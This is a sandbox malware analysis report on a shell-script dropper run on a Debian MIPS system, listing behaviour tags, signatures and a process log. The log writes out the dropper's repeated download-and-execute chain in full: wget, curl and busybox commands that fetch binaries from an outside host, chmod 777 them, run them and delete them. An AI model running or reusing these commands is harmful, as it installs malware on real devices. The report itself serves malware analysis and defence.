Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-b88q6szanh
Target 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
SHA256 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e

Threat Level: Shows suspicious behavior

The file 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 01:50

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 01:50

Reported

2024-10-18 01:52

Platform

debian9-mipsbe-20240729-en

Max time kernel

150s

Max time network

151s

Command Line

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A
N/A /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq N/A
N/A /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 N/A
N/A /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu N/A
N/A /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g N/A
N/A /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 N/A
N/A /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ N/A
N/A /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 N/A
N/A /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 N/A
N/A /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 N/A
N/A /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe N/A
N/A /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E N/A
N/A /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT N/A
N/A /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A
File opened for modification /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 /usr/bin/curl N/A
File opened for modification /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe /usr/bin/curl N/A
File opened for modification /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 /usr/bin/curl N/A
File opened for modification /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz /usr/bin/curl N/A
File opened for modification /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 /usr/bin/curl N/A
File opened for modification /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu /usr/bin/curl N/A
File opened for modification /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 /usr/bin/curl N/A
File opened for modification /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 /usr/bin/curl N/A
File opened for modification /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g /usr/bin/curl N/A
File opened for modification /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ /usr/bin/curl N/A

Processes

/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh

[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/chmod

[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/bin/rm

[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/chmod

[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT

[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/bin/rm

[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/chmod

[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz

[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/bin/rm

[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/chmod

[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319

[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/bin/rm

[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/chmod

[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe

[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/bin/rm

[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/chmod

[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0

[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/bin/rm

[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/chmod

[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6

[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/bin/rm

[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/chmod

[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq

[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/bin/rm

[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/chmod

[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94

[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/bin/rm

[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/chmod

[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu

[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/bin/rm

[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/chmod

[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g

[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/bin/rm

[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/chmod

[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12

[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/bin/rm

[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/chmod

[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ

[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/bin/rm

[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/chmod

[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3

[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]

/bin/rm

